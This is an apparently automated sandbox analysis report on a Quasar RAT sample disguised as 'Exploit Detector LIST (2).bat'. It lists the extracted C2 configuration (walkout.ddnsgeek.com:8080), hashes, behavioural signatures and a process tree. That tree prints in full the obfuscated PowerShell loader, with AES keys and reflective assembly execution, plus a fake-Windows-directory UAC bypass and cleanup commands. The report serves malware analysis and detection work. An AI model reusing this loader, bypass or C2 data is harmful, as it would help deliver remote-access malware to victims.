quasar | 67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

Analysis

max time kernel
109s
max time network
147s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
10-11-2024 09:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Exploit Detector LIST (2).bat
Size

535KB
MD5

b9e1a4ea5f3b3fd0b0394183365edf8b
SHA1

79bec6a406682c1385ba71a62e70b5744de0fb76
SHA256

67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86
SHA512

132bcd79be79e2b2fb6319d25f9ae89fc8bda65c9872792181b270cd31ad43998c1a34319e9d2f66e7bf3f035428231644d3c253e6eb1ae30095b64a702cf969
SSDEEP

12288:jdnWhmK+sUu8PzDo84iBk1XZq51gzyqS996PxMdGos+Rcxdj:9WhmFsJ848Zk9KyMdGL+Y5

Score

10^/10

quasar office04 defense_evasion discovery execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

Office04

walkout.ddnsgeek.com:8080

Mutex

27391f85-a482-471a-b2cd-1f8ab5bde32e

Attributes

encryption_key
6469F8C5BA9A2CFDCF4A3F1651D1E92DBEA41117
install_name
Client.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Quasar Client Startup
subdirectory
SubDir

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar
Quasar family
quasar

Quasar payload 1 IoCs

resource	yara_rule
behavioral2/memory/1492-91-0x00000000071E0000-0x0000000007504000-memory.dmp	family_quasar

Blocklisted process makes network request 6 IoCs

flow	pid	Process
14	1460	powershell.exe
24	1492	powershell.exe
25	1492	powershell.exe
27	1492	powershell.exe
28	1772	powershell.exe
31	1460	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2096	powershell.exe
3132	powershell.exe
1492	powershell.exe
1708	powershell.exe
4764	powershell.exe
2756	powershell.exe
1708	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
1416	ComputerDefaults.exe

Loads dropped DLL 1 IoCs

pid	Process
1416	ComputerDefaults.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Program crash 1 IoCs

pid	pid_target	Process	procid_target
1632	1416	WerFault.exe	99

System Location Discovery: System Language Discovery 1 TTPs 19 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ComputerDefaults.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Suspicious behavior: EnumeratesProcesses 25 IoCs

pid	Process
1460	powershell.exe
1460	powershell.exe
3132	powershell.exe
3132	powershell.exe
1492	powershell.exe
1492	powershell.exe
1492	powershell.exe
1708	powershell.exe
1708	powershell.exe
1772	powershell.exe
1772	powershell.exe
1772	powershell.exe
1708	powershell.exe
4764	powershell.exe
4764	powershell.exe
4764	powershell.exe
2756	powershell.exe
2756	powershell.exe
2756	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
2096	powershell.exe
2096	powershell.exe
2096	powershell.exe

Suspicious use of AdjustPrivilegeToken 9 IoCs

description	pid	Process
Token: SeDebugPrivilege	1460	powershell.exe
Token: SeDebugPrivilege	3132	powershell.exe
Token: SeDebugPrivilege	1492	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	1772	powershell.exe
Token: SeDebugPrivilege	4764	powershell.exe
Token: SeDebugPrivilege	2756	powershell.exe
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	2096	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
1492	powershell.exe

Suspicious use of WriteProcessMemory 59 IoCs

description	pid	Process	procid_target
PID 4508 wrote to memory of 1528	4508	cmd.exe	87
PID 4508 wrote to memory of 1528	4508	cmd.exe	87
PID 4508 wrote to memory of 1460	4508	cmd.exe	88
PID 4508 wrote to memory of 1460	4508	cmd.exe	88
PID 4508 wrote to memory of 1460	4508	cmd.exe	88
PID 1460 wrote to memory of 3132	1460	powershell.exe	91
PID 1460 wrote to memory of 3132	1460	powershell.exe	91
PID 1460 wrote to memory of 3132	1460	powershell.exe	91
PID 1460 wrote to memory of 4640	1460	powershell.exe	95
PID 1460 wrote to memory of 4640	1460	powershell.exe	95
PID 1460 wrote to memory of 4640	1460	powershell.exe	95
PID 1460 wrote to memory of 2484	1460	powershell.exe	97
PID 1460 wrote to memory of 2484	1460	powershell.exe	97
PID 1460 wrote to memory of 2484	1460	powershell.exe	97
PID 2484 wrote to memory of 1416	2484	cmd.exe	99
PID 2484 wrote to memory of 1416	2484	cmd.exe	99
PID 2484 wrote to memory of 1416	2484	cmd.exe	99
PID 1416 wrote to memory of 1576	1416	ComputerDefaults.exe	100
PID 1416 wrote to memory of 1576	1416	ComputerDefaults.exe	100
PID 1416 wrote to memory of 1576	1416	ComputerDefaults.exe	100
PID 1576 wrote to memory of 876	1576	cmd.exe	102
PID 1576 wrote to memory of 876	1576	cmd.exe	102
PID 1576 wrote to memory of 876	1576	cmd.exe	102
PID 4640 wrote to memory of 1084	4640	cmd.exe	105
PID 4640 wrote to memory of 1084	4640	cmd.exe	105
PID 4640 wrote to memory of 1084	4640	cmd.exe	105
PID 4640 wrote to memory of 1492	4640	cmd.exe	106
PID 4640 wrote to memory of 1492	4640	cmd.exe	106
PID 4640 wrote to memory of 1492	4640	cmd.exe	106
PID 1492 wrote to memory of 1708	1492	powershell.exe	107
PID 1492 wrote to memory of 1708	1492	powershell.exe	107
PID 1492 wrote to memory of 1708	1492	powershell.exe	107
PID 876 wrote to memory of 396	876	cmd.exe	108
PID 876 wrote to memory of 396	876	cmd.exe	108
PID 876 wrote to memory of 396	876	cmd.exe	108
PID 876 wrote to memory of 1772	876	cmd.exe	109
PID 876 wrote to memory of 1772	876	cmd.exe	109
PID 876 wrote to memory of 1772	876	cmd.exe	109
PID 1772 wrote to memory of 4764	1772	powershell.exe	110
PID 1772 wrote to memory of 4764	1772	powershell.exe	110
PID 1772 wrote to memory of 4764	1772	powershell.exe	110
PID 1460 wrote to memory of 2288	1460	powershell.exe	111
PID 1460 wrote to memory of 2288	1460	powershell.exe	111
PID 1460 wrote to memory of 2288	1460	powershell.exe	111
PID 1772 wrote to memory of 448	1772	powershell.exe	113
PID 1772 wrote to memory of 448	1772	powershell.exe	113
PID 1772 wrote to memory of 448	1772	powershell.exe	113
PID 1772 wrote to memory of 2756	1772	powershell.exe	115
PID 1772 wrote to memory of 2756	1772	powershell.exe	115
PID 1772 wrote to memory of 2756	1772	powershell.exe	115
PID 448 wrote to memory of 4576	448	cmd.exe	117
PID 448 wrote to memory of 4576	448	cmd.exe	117
PID 448 wrote to memory of 4576	448	cmd.exe	117
PID 448 wrote to memory of 1708	448	cmd.exe	118
PID 448 wrote to memory of 1708	448	cmd.exe	118
PID 448 wrote to memory of 1708	448	cmd.exe	118
PID 1708 wrote to memory of 2096	1708	powershell.exe	119
PID 1708 wrote to memory of 2096	1708	powershell.exe	119
PID 1708 wrote to memory of 2096	1708	powershell.exe	119

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Exploit Detector LIST (2).bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4508
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\Exploit Detector LIST (2).bat';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
  2⤵
  PID:1528
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
  2⤵
  - Blocklisted process makes network request
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1460
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3132
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4640
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
      4⤵
      System Location Discovery: System Language Discovery
      PID:1084
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1492
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1708
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c "C:\Windows \System32\ComputerDefaults.exe"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2484
  - - C:\Windows \System32\ComputerDefaults.exe
      "C:\Windows \System32\ComputerDefaults.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:1416
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1576
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\SC.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:876
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('iZqoW2CsAJeY9D83aLEj+3rxJ2t2B3ify+RUYbhDZLc='); $aes_var.IV=[System.Convert]::FromBase64String('HqkR8+zl0nkre/D9VtHffg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$cFfgm=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$eBtZT=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$Baxky=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($cFfgm, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $Baxky.CopyTo($eBtZT); $Baxky.Dispose(); $cFfgm.Dispose(); $eBtZT.Dispose(); $eBtZT.ToArray();}function execute_function($param_var,$param2_var){ IEX '$UGiVy=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$iInyN=$UGiVy.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$iInyN.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$rrktb = 'C:\Users\Admin\AppData\Local\Temp\SC.cmd';$host.UI.RawUI.WindowTitle = $rrktb;$zVxza=[System.IO.File]::ReadAllText($rrktb).Split([Environment]::NewLine);foreach ($vxMZN in $zVxza) { if ($vxMZN.StartsWith('SkRmYQdHVSEYUqjPEfjK')) { $uwpGR=$vxMZN.Substring(20); break; }}$payloads_var=[string[]]$uwpGR.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
        7⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1772
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4764
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd" "
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:448
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo cls;powershell -w hidden;function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::FromBase64String('dZwBIL8mRiTZatOT8DHuTDuk3Oo1l68JNKsZ1rANWLs='); $aes_var.IV=[System.Convert]::FromBase64String('VRFaPmL5cO3W99Q3sAgvnA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ IEX '$Sopqh=New-Object System.IO.M*em*or*yS*tr*ea*m(,$param_var);'.Replace('*', ''); IEX '$LWDBe=New-Object System.IO.*M*e*m*o*r*y*S*t*r*e*a*m*;'.Replace('*', ''); IEX '$TccZi=New-Object System.IO.C*om*pr*e*ss*io*n.*GZ*ip*St*re*am*($Sopqh, [IO.C*om*pr*es*si*on*.Co*mp*re*ss*i*o*n*Mode]::D*e*c*omp*re*ss);'.Replace('*', ''); $TccZi.CopyTo($LWDBe); $TccZi.Dispose(); $Sopqh.Dispose(); $LWDBe.Dispose(); $LWDBe.ToArray();}function execute_function($param_var,$param2_var){ IEX '$MWnnv=[System.R*e*fl*ect*io*n.*As*se*mb*l*y*]::L*o*a*d*([byte[]]$param_var);'.Replace('*', ''); IEX '$jHyaV=$MWnnv.*E*n*t*r*y*P*o*i*n*t*;'.Replace('*', ''); IEX '$jHyaV.*I*n*v*o*k*e*($null, $param2_var);'.Replace('*', '');}$mjRKG = 'C:\Users\Admin\AppData\Roaming\temp\mbbkel3.cmd';$host.UI.RawUI.WindowTitle = $mjRKG;$ysPnv=[System.IO.File]::ReadAllText($mjRKG).Split([Environment]::NewLine);foreach ($akrhi in $ysPnv) { if ($akrhi.StartsWith('dUMGHfMAItMYvjVTxFtd')) { $XDrXi=$akrhi.Substring(20); break; }}$payloads_var=[string[]]$XDrXi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));$payload3_var=decompress_function (decrypt_function ([Convert]::FromBase64String($payloads_var[2].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var $null;execute_function $payload3_var (,[string[]] ('')); "
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4576
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        10⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2096
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command " Remove-Item '\\?\C:\Windows \' -Force -Recurse "
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2756
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1416 -s 1088
        5⤵
        Program crash
        
        PID:1632
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /c rmdir "c:\Windows \"/s /q
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1416 -ip 1416
1⤵
PID:4364

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
928d36ad618a369ffebf44885d07cf81

SHA1
edf5a353a919c1873af8e6a0dfafa4c38c626975

SHA256
d3436adbbe4dcb701c214f108dcd7babddbbc1b3b6f6dd6f5a4c5fc8c1a507ea

SHA512
4ca6f5da3cf41f7ea938eaa80e169ed3ba33c93ada8932d2683c5a57e632b963d0cb84bc6330cb1454801f0fbed02f97c8b8c7bbd992c8fdf603220f2be9086a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Filesize
53KB

MD5
3337d66209faa998d52d781d0ff2d804

SHA1
6594b85a70f998f79f43cdf1ca56137997534156

SHA256
9b946b062865f68b9f0f43a011d33d7ea0926a3c8f78fb20d9cab6144314e1bd

SHA512
8bbd14bd73111f7b55712f5d1e1b727e41db8e6e0c1243ee6809ff32b509e52dec7af34c064151fb5beccd59dda434a3f83abe987c561a25abfbb4cbcf9c7f1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
e6be5eb0ca6e36394016ec3899271b09

SHA1
722149cca020ab566892ce7759b1b083ed72b31a

SHA256
0b959f57ab94b0f65449e8631c29cdf07975f57f01a0546a02d621b22d9ba9b8

SHA512
9a8a2a2677c61ed6accb6fb3e35dcbe4f737d873b4544107b4bfed5fc1c35034d113fafdf39bebe50e6f311b0fd275dd791f29a559b9c3d0cc07c3f5fa607981

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
aaa9947067616f1e0f9beff0332a4bd3

SHA1
1a77e859afaa02ab04528af963d4950c7a406119

SHA256
aa8ba1b793990a7798e6bf0a024543a9050decb35838ef87a7ec40f99b626642

SHA512
4fc4ac001a3fc00c31813b4867bff6a5162326954c0d047eda8aab71e9f84daf6d47079f67508c1f6b44957b611ea9614763c0aae8e81cc457db69e3ac5626cc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
592B

MD5
9b5e5a7f5976a66d2fcacb538a6f0c24

SHA1
cb1f6c53641faa3e7eaf2cb99fb1f9b6725bf017

SHA256
ba330f3d6971159927feb40a1e7c8da23c924596c9f09c3da2738e814daa786a

SHA512
cfd76717c163b8e1a33ce1e8fb7c5bad47d48ee2cd2dd272a2f7b45a4cd1e55ccc8b68bafd46b72343a508f5c5fbc68310598c6d4101f9b3ea4c8769d7fd49e4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
21KB

MD5
676418f57b4188c622ce17a4bf4b22c4

SHA1
01a1d0bfaa6d5e418f666950fb8ae8698c586e28

SHA256
2777d57d141f2da885da0fa62fe8f28e9fcb094d116b8e8c8905ecaf62a23444

SHA512
026df00cdf0b511c992b471030c12f5df0c74a073cef9635c6b82829a5f6c5d9505bf76d08fdb1af494cc761bf7f48dfdb3db2db27655d840ab306f7908c449c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
1cdede2f0da923844cd021e0aea37391

SHA1
c4685ff6a4c3f1b0200699d8398e6ae93acb50dd

SHA256
36edd69a395d1797e2c7d47cea082faf050da69388f8081abdbcdf4bd468889b

SHA512
a4c191a5598e87ed95caf5612d7d6f3ba002d84b53c8ae748bf6a4a113f4ae118ff74cb0a1e59a8ab2a8da459974e6d9f24f2c9f8b8f889d64faf306ec7ae96c

Download Submit
C:\Users\Admin\AppData\Local\Temp\SC.cmd

Filesize
535KB

MD5
b9e1a4ea5f3b3fd0b0394183365edf8b

SHA1
79bec6a406682c1385ba71a62e70b5744de0fb76

SHA256
67d3bd519670a3a0fdcb3b30b0e143e73225cf561d2448a92e8e9378e989ac86

SHA512
